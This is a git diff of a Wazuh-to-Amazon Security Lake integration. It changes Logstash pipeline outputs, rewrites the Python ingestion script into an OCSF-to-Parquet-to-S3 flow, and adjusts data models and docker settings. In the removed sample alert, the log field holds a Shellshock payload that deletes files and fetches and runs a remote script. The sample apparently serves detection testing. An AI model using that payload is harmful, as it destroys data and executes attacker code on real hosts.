diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
index e9fdbb5da593b..1bee9afc62450 100644
--- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
@@ -23,7 +23,7 @@ input {
 output {
     stdout {
         id => "output.stdout"
-        codec => rubydebug
+        codec => json_lines
     }
     file {
         id => "output.file"
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
index c165be2530f49..afd7712413ddf 100644
--- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
@@ -20,11 +20,14 @@ input {
 }
 
 output {
-    pipe {
-        id => "securityLake"
-        message_format => "%{_source}"
-        ttl => "10"
-        command => "/env/bin/python3 /usr/share/logstash/amazon-security-lake/run.py -d"
-        # command => "/usr/share/logstash/amazon-security-lake/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --bucketname securitylake --s3endpoint s3.ninja:9000 --s3profile default"
-    }
+    stdout {
+        id => "output.stdout"
+        codec => json_lines
+    }
+    pipe {
+        id => "output.integrator"
+        ttl => "10"
+        command => "/env/bin/python3 /usr/share/logstash/amazon-security-lake/run.py"
+        # command => "/usr/share/logstash/amazon-security-lake/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --bucketname securitylake --s3endpoint s3.ninja:9000 --s3profile default"
+    }
 }
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
index 397a875144ae2..35f411b4429d9 100644
--- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
@@ -22,7 +22,7 @@ input {
 output {
     stdout {
         id => "output.stdout"
-        codec => rubydebug
+        codec => json_lines
     }
     s3 {
         id => "output.s3"
@@ -30,7 +30,7 @@ output {
         secret_access_key => "${AWS_SECRET}"
         region => "${AWS_REGION}"
         endpoint => "http://s3.ninja:9000"
-        bucket => "wazuh-indexer-amazon-security-lake-bucket"
+        bucket => "${AWS_BUCKET}"
         codec => "json"
         retry_count => 0
         validate_credentials_on_root_bucket => false
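Note: with codec json_lines on the stdout and pipe outputs, Logstash now hands the integrator one JSON document per line over stdin. A minimal, standalone sketch of a consumer of that stream (illustration only, not part of this changeset; run.py below is the real consumer):

    # Reads the json_lines stream produced by the pipe output:
    # one JSON document per line on standard input.
    import json
    import sys

    for line in sys.stdin:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError as err:
            print(f"skipping malformed line: {err}", file=sys.stderr)
            continue
        # Each event is a full Wazuh alert; hand it to the transform step here.
        print(event.get("rule", {}).get("description", "unknown rule"))
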
diff --git a/integrations/amazon-security-lake/src/run.py b/integrations/amazon-security-lake/src/run.py
index 739c6a027432d..a1d948aa64587 100644
--- a/integrations/amazon-security-lake/src/run.py
+++ b/integrations/amazon-security-lake/src/run.py
@@ -1,227 +1,129 @@
-#!/env/bin/python3.9
+#!/env/bin/python3
 # vim: bkc=yes bk wb
-import os
 import sys
-import argparse
-import logging
-import time
-import json
+import os
 import datetime
-import boto3
 import transform
-from pyarrow import parquet, Table, fs
-
-
-logging.basicConfig(
-    format='%(asctime)s %(message)s',
-    encoding='utf-8',
-    level=logging.DEBUG
-)
-
-BLOCK_ENDING = {"block_ending": True}
-
-
-def create_arg_parser():
-    parser = argparse.ArgumentParser(
-        description='Wazuh\'s integrator module for Amazon Security Lake')
-    parser.add_argument(
-        '-d',
-        '--debug',
-        action='store_true',
-        help='Enable debug output'
-    )
-    parser.add_argument(
-        '-b',
-        '--bucketname',
-        type=str,
-        action='store',
-        help='S3 bucket name to write parquet files to'
-    )
-    parser.add_argument(
-        '-e',
-        '--s3endpoint',
-        type=str,
-        action='store',
-        default=None,
-        help='Hostname and port of the S3 destination (defaults to AWS\')'
-    )
-    parser.add_argument(
-        '-i',
-        '--pushinterval',
-        type=int,
-        action='store',
-        default=299,
-        help='Time interval in seconds for pushing data to Security Lake'
-    )
-    parser.add_argument(
-        '-l',
-        '--logoutput',
-        type=str,
-        default="/tmp/indexer-to-security-lake-data.txt",
-        help='File path of the destination file to write to'
-    )
-    parser.add_argument(
-        '-m',
-        '--maxlength',
-        type=int,
-        action='store',
-        default=2000,
-        help='Event number threshold for submission to Security Lake'
-    )
-    parser.add_argument(
-        '-n',
-        '--linebuffer',
-        type=int,
-        action='store',
-        default=100,
-        help='Stadndard input\'s line buffer length'
-    )
-    parser.add_argument(
-        '-p',
-        '--s3profile',
-        type=str,
-        action='store',
-        default='default',
-        help='AWS profile as stored in credentials file'
-    )
-    parser.add_argument(
-        '-s',
-        '--sleeptime',
-        type=int,
-        action='store',
-        default=5,
-        help='Input buffer polling interval'
-    )
-    return parser
-
-
-def s3authenticate(profile, endpoint=None, scheme='https'):
-    session = boto3.session.Session(profile_name=profile)
-    credentials = session.get_credentials()
-
-    if endpoint != None:
-        scheme = 'http'
-
-    s3fs = fs.S3FileSystem(
-        endpoint_override=endpoint,
-        access_key=credentials.access_key,
-        secret_key=credentials.secret_key,
-        scheme=scheme
+import pyarrow as pa
+import pyarrow.parquet as pq
+import logging
+import boto3
+from botocore.exceptions import ClientError
+
+# NOTE work in progress
+def upload_file(file_name, bucket, object_name=None):
+    """Upload a file to an S3 bucket
+
+    :param file_name: File to upload
+    :param bucket: Bucket to upload to
+    :param object_name: S3 object name. If not specified then file_name is used
+    :return: True if file was uploaded, else False
+    """
+
+    # session = boto3.Session(
+    #     aws_access_key_id=os.environ['AWS_KEY'],
+    #     aws_secret_access_key=os.environ['AWS_SECRET']
+    # )
+    s3 = boto3.resource(
+        's3',
+        aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],
+        aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],
+        region_name=os.environ['AWS_REGION']
     )
-    return s3fs
-
+    # If S3 object_name was not specified, use file_name
+    if object_name is None:
+        object_name = os.path.basename(file_name)
 
-def encode_parquet(list, bucketname, filename, filesystem):
+    # Upload the file
+    # s3_client = boto3.client('s3')
     try:
-        table = Table.from_pylist(list)
-        parquet.write_table(
-            table,
-            '{}/{}'.format(bucketname, filename), filesystem=filesystem
-        )
-    except Exception as e:
+        # s3_client.upload_file(file_name, bucket, object_name)
+        # Bucket.upload_file() requires the local path and the object key.
+        s3.Bucket(bucket).upload_file(file_name, object_name)
+    except ClientError as e:
         logging.error(e)
-        raise
-
-
-def map_block(fileobject, length):
-    output = []
-    ocsf_event = {}
-    for line in range(0, length):
-        line = fileobject.readline()
-        if line == '':
-            output.append(BLOCK_ENDING)
-            break
-        # alert = json.loads(line)
-        # ocsf_event = converter.convert(alert)
-
-        event = transform.converter.from_json(line)
-        print(event)
-        ocsf_event = transform.converter.to_detection_finding(event)
-
-        output.append(ocsf_event)
-    return output
-
-
-def timedelta(reference_timestamp):
-    current_time = datetime.datetime.now(datetime.timezone.utc)
-    return (current_time - reference_timestamp).total_seconds()
-
-
-def utctime():
-    return datetime.datetime.now(datetime.timezone.utc)
+        return False
+    return True
+
+
+def main():
+    '''Main function'''
+    # Get current timestamp
+    timestamp = datetime.datetime.now(datetime.timezone.utc).isoformat()
+
+    # Generate filenames
+    filename_raw = f"/tmp/integrator-raw-{timestamp}.json"
+    filename_ocsf = f"/tmp/integrator-ocsf-{timestamp}.json"
+    filename_parquet = f"/tmp/integrator-ocsf-{timestamp}.parquet"
+
+    # 1. Extract data
+    # ================
+    raw_data = []
+    for line in sys.stdin:
+        raw_data.append(line)
+
+        # Echo piped data
+        with open(filename_raw, "a") as fd:
+            fd.write(line)
+
+    # 2. Transform data
+    # ================
+    # a. Transform to OCSF
+    ocsf_data = []
+    for line in raw_data:
+        try:
+            # raw_event = json.loads(line)
+            event = transform.converter.from_json(line)
+            # ocsf_event = transform.converter.to_detection_finding(event)
+            ocsf_event = transform.converter.to_detection_finding(event)
+            ocsf_data.append(ocsf_event.model_dump())
+            # Temporary disk storage
+            with open(filename_ocsf, "a") as fd:
+                fd.write(str(ocsf_event) + "\n")
+        except AttributeError as e:
+            print("Error transforming line to OCSF")
+            print(event)
+            print(e)
 
-if __name__ == "__main__":
+    # b. Encode as Parquet
     try:
-        args = create_arg_parser().parse_args()
-        logging.info('BUFFERING STDIN')
-
-        with os.fdopen(sys.stdin.fileno(), 'rt') as stdin:
-            output_buffer = []
-            loop_start_time = utctime()
-
-            try:
-                s3fs = s3authenticate(args.s3profile, args.s3endpoint)
-                while True:
+        table = pa.Table.from_pylist(ocsf_data)
+        pq.write_table(table, filename_parquet)
+        # parquet.Parquet.to_file(table, filename_parquet)
+    except AttributeError as e:
+        print("Error encoding data to parquet")
+        print(e)
 
-                    current_block = map_block(stdin, args.linebuffer)
-
-                    if current_block[-1] == BLOCK_ENDING:
-                        output_buffer += current_block[0:-1]
-                        time.sleep(args.sleeptime)
-                    else:
-                        output_buffer += current_block
-
-                    buffer_length = len(output_buffer)
-
-                    if buffer_length == 0:
-                        continue
-
-                    elapsed_seconds = timedelta(loop_start_time)
-
-                    if buffer_length > args.maxlength or elapsed_seconds > args.pushinterval:
-                        logging.info(
-                            'Elapsed seconds: {}'.format(elapsed_seconds))
-                        loop_start_time = utctime()
-                        timestamp = loop_start_time.strftime('%F_%H.%M.%S')
-                        filename = 'wazuh-{}.parquet'.format(timestamp)
-                        logging.info(
-                            'Writing data to s3://{}/{}'.format(args.bucketname, filename))
-                        encode_parquet(
-                            output_buffer, args.bucketname, filename, s3fs)
-                        output_buffer = []
-
-            except KeyboardInterrupt:
-                logging.info("Keyboard Interrupt issued")
-                exit(0)
-
-        logging.info('FINISHED RETRIEVING STDIN')
-
-    except Exception as e:
-        logging.error("Error running script")
-        logging.error(e)
-        raise
+    # 3. Load data
+    # ================
+    # parquet.parquet.Parquet.to_s3(table, filename_parquet)
+    upload_file(filename_parquet, os.environ['AWS_BUCKET'])
 
 
 def _test():
     ocsf_event = {}
     with open("./wazuh-event.sample.json", "r") as fd:
         # Load from file descriptor
-        raw_event = json.load(fd)
-        try:
-            event = transform.converter.from_json(raw_event)
-            print(event)
-            ocsf_event = transform.converter.to_detection_finding(event)
-            print("")
-            print("--")
-            print("")
-            print(ocsf_event)
+        for raw_event in fd:
+            try:
+                event = transform.converter.from_json(raw_event)
+                print("")
+                print("-- Wazuh event Pydantic model")
+                print("")
+                print(event.model_dump())
+                ocsf_event = transform.converter.to_detection_finding(event)
+                print("")
+                print("-- Converted to OCSF")
+                print("")
+                print(ocsf_event.model_dump())
 
-        except KeyError as e:
-            raise (e)
+            except KeyError as e:
+                raise (e)
 
 
 if __name__ == '__main__':
-    _test()
+    main()
+    # _test()
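Note: the rewritten run.py above can be exercised without Logstash by feeding it the sample event file. A rough sketch of the same transform-and-encode path as a standalone check, assuming it is run from integrations/amazon-security-lake/src so the transform package and wazuh-event.sample.json are reachable:

    # Mirrors the new main(): parse each JSON line, convert it to an OCSF
    # Detection Finding, and encode the batch as a Parquet file.
    import pyarrow as pa
    import pyarrow.parquet as pq

    import transform

    ocsf_data = []
    with open("wazuh-event.sample.json") as fd:
        for line in fd:
            event = transform.converter.from_json(line)
            finding = transform.converter.to_detection_finding(event)
            ocsf_data.append(finding.model_dump())

    table = pa.Table.from_pylist(ocsf_data)
    pq.write_table(table, "/tmp/wazuh-events.sample.parquet")
    print(pq.read_table("/tmp/wazuh-events.sample.parquet").num_rows)
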
diff --git a/integrations/amazon-security-lake/src/transform/converter.py b/integrations/amazon-security-lake/src/transform/converter.py
index 90f8eeef27bac..88477b0dae814 100644
--- a/integrations/amazon-security-lake/src/transform/converter.py
+++ b/integrations/amazon-security-lake/src/transform/converter.py
@@ -90,9 +90,16 @@ def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFind
     )
 
 
-def from_json(event: dict) -> models.wazuh.Event:
+# def from_json(event: dict) -> models.wazuh.Event:
+#     # Needs to a string, bytes or bytearray
+#     try:
+#         return models.wazuh.Event.model_validate_json(json.dumps(event))
+#     except pydantic.ValidationError as e:
+#         print(e)
+
+def from_json(event: str) -> models.wazuh.Event:
     # Needs to a string, bytes or bytearray
     try:
-        return models.wazuh.Event.model_validate_json(json.dumps(event))
+        return models.wazuh.Event.model_validate_json(event)
     except pydantic.ValidationError as e:
-        print(e)
+        print(e)
\ No newline at end of file
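Note: from_json() now takes the raw JSON string that Logstash emits per line and validates it directly with model_validate_json(), so the json.dumps() round trip is gone. A short usage sketch, assuming the transform package from this integration is importable:

    import transform

    raw_line = '{"id": "1580123327.49031", "rule": {"id": "80791", "level": 3}}'

    # Before this change: from_json(json.loads(raw_line)) re-serialized the dict internally.
    # Now the string goes straight to pydantic's model_validate_json().
    event = transform.converter.from_json(raw_line)
    print(event.id, event.rule.id, event.rule.level)
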
diff --git a/integrations/amazon-security-lake/src/transform/models/wazuh.py b/integrations/amazon-security-lake/src/transform/models/wazuh.py
index 34aa3c91e96e1..f73ed832b9165 100644
--- a/integrations/amazon-security-lake/src/transform/models/wazuh.py
+++ b/integrations/amazon-security-lake/src/transform/models/wazuh.py
@@ -6,27 +6,27 @@
 
 
 class Mitre(pydantic.BaseModel):
-    technique: typing.List[str] = []
-    id: typing.List[str] = ""
-    tactic: typing.List[str] = []
+    technique: typing.List[str] = ["N/A"]
+    id: typing.List[str] = ["N/A"]
+    tactic: typing.List[str] = ["N/A"]
 
 
 class Rule(pydantic.BaseModel):
     firedtimes: int = 0
-    description: str = ""
+    description: str = "N/A"
     groups: typing.List[str] = []
-    id: str = ""
+    id: str = "N/A"
     mitre: Mitre = Mitre()
     level: int = 0
     nist_800_53: typing.List[str] = []
 
 
 class Decoder(pydantic.BaseModel):
-    name: str
+    name: str = "N/A"
 
 
 class Input(pydantic.BaseModel):
-    type: str
+    type: str = "N/A"
 
 
 class Agent(pydantic.BaseModel):
@@ -39,9 +39,9 @@ class Manager(pydantic.BaseModel):
 
 
 class Event(pydantic.BaseModel):
-    rule: Rule = {}
-    decoder: Decoder = {}
-    input: Input = {}
+    rule: Rule = Rule()
+    decoder: Decoder = Decoder()
+    input: Input = Input()
     id: str = ""
     full_log: str = ""
     agent: Agent = {}
diff --git a/integrations/amazon-security-lake/src/wazuh-event.sample.json b/integrations/amazon-security-lake/src/wazuh-event.sample.json
index d7e0558b62c62..b161bf24db419 100644
--- a/integrations/amazon-security-lake/src/wazuh-event.sample.json
+++ b/integrations/amazon-security-lake/src/wazuh-event.sample.json
@@ -1,76 +1 @@
-{
-    "input": {
-        "type": "log"
-    },
-    "agent": {
-        "name": "redacted.com",
-        "id": "000"
-    },
-    "manager": {
-        "name": "redacted.com"
-    },
-    "data": {
-        "protocol": "GET",
-        "srcip": "000.111.222.10",
-        "id": "404",
-        "url": "/cgi-bin/jarrewrite.sh"
-    },
-    "rule": {
-        "firedtimes": 1,
-        "mail": false,
-        "level": 6,
-        "pci_dss": [
-            "11.4"
-        ],
-        "tsc": [
-            "CC6.1",
-            "CC6.8",
-            "CC7.2",
-            "CC7.3"
-        ],
-        "description": "Shellshock attack attempt",
-        "groups": [
-            "web",
-            "accesslog",
-            "attack"
-        ],
-        "mitre": {
-            "technique": [
-                "Exploitation for Privilege Escalation",
-                "Exploit Public-Facing Application"
-            ],
-            "id": [
-                "T1068",
-                "T1190"
-            ],
-            "tactic": [
-                "Privilege Escalation",
-                "Initial Access"
-            ]
-        },
-        "id": "31166",
-        "nist_800_53": [
-            "SI.4"
-        ],
-        "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
-        "gdpr": [
-            "IV_35.7.d"
-        ]
-    },
-    "location": "/var/log/nginx/access.log",
-    "decoder": {
-        "name": "web-accesslog"
-    },
-    "id": "1707402914.872885",
-    "GeoLocation": {
-        "city_name": "Amsterdam",
-        "country_name": "Netherlands",
-        "region_name": "North Holland",
-        "location": {
-            "lon": 4.9087,
-            "lat": 52.3534
-        }
-    },
-    "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
-    "timestamp": "2024-02-08T11:35:14.334-0300"
-}
\ No newline at end of file
+{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"agent":{"id":"003","ip":"10.0.0.180","name":"ip-10-0-0-180.us-west-1.compute.internal"},"@timestamp":"2024-03-14T12:57:05.730Z","data":{"audit":{"exe":"/usr/sbin/sshd","type":"NORMAL","cwd":"/home/wazuh","file":{"name":"/var/sample"},"success":"yes","command":"ssh"}},"@version":"1","manager":{"name":"wazuh-manager"},"location":"","decoder":{},"id":"1580123327.49031","predecoder":{},"timestamp":"2024-03-14T12:57:05.730+0000","rule":{"description":"Audit: Command: /usr/sbin/ssh","firedtimes":3,"level":3,"id":"80791","mail":false,"groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]}}
\ No newline at end of file
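Note: with defaults on every field, sparse alerts such as the new one-line audit sample (which ships an empty "decoder": {} and no "input" key) validate instead of raising, and the converter sees "N/A" placeholders. A small sketch, assuming the transform package from this integration is importable:

    from transform.models import wazuh

    sparse = '{"id": "1580123327.49031", "decoder": {}, "rule": {"id": "80791", "groups": ["audit"]}}'

    event = wazuh.Event.model_validate_json(sparse)
    print(event.decoder.name)          # "N/A" -- the default fills the empty object
    print(event.input.type)            # "N/A" -- Input() default instance
    print(event.rule.mitre.technique)  # ["N/A"]
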
"log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" -} \ No newline at end of file +{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"agent":{"id":"003","ip":"10.0.0.180","name":"ip-10-0-0-180.us-west-1.compute.internal"},"@timestamp":"2024-03-14T12:57:05.730Z","data":{"audit":{"exe":"/usr/sbin/sshd","type":"NORMAL","cwd":"/home/wazuh","file":{"name":"/var/sample"},"success":"yes","command":"ssh"}},"@version":"1","manager":{"name":"wazuh-manager"},"location":"","decoder":{},"id":"1580123327.49031","predecoder":{},"timestamp":"2024-03-14T12:57:05.730+0000","rule":{"description":"Audit: Command: /usr/sbin/ssh","firedtimes":3,"level":3,"id":"80791","mail":false,"groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]}} \ No newline at end of file diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 1348b8bce56c6..0a1465d2e6d81 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -80,9 +80,10 @@ services: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" MONITORING_ENABLED: false - AWS_KEY: "AKIAIOSFODNN7EXAMPLE" - AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" + AWS_ACCESS_KEY_ID: "AKIAIOSFODNN7EXAMPLE" + AWS_SECRET_ACCESS_KEY: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" AWS_REGION: "us-east-1" + AWS_BUCKET: "wazuh-indexer-amazon-security-lake-bucket" ports: - "5000:5000/tcp" - "5000:5000/udp" @@ -91,7 +92,7 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline # TODO has 1000:1000. logstash's uid is 999 - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem - - ../amazon-security-lake/src:/usr/share/logstash/amazon-security-lake + - ../amazon-security-lake/src:/usr/share/logstash/amazon-security-lake # TODO use dedicated folder # - ./credentials:/usr/share/logstash/.aws/credentials # TODO credentials are not commited (missing) command: tail -f /var/log/logstash/logstash-plain.log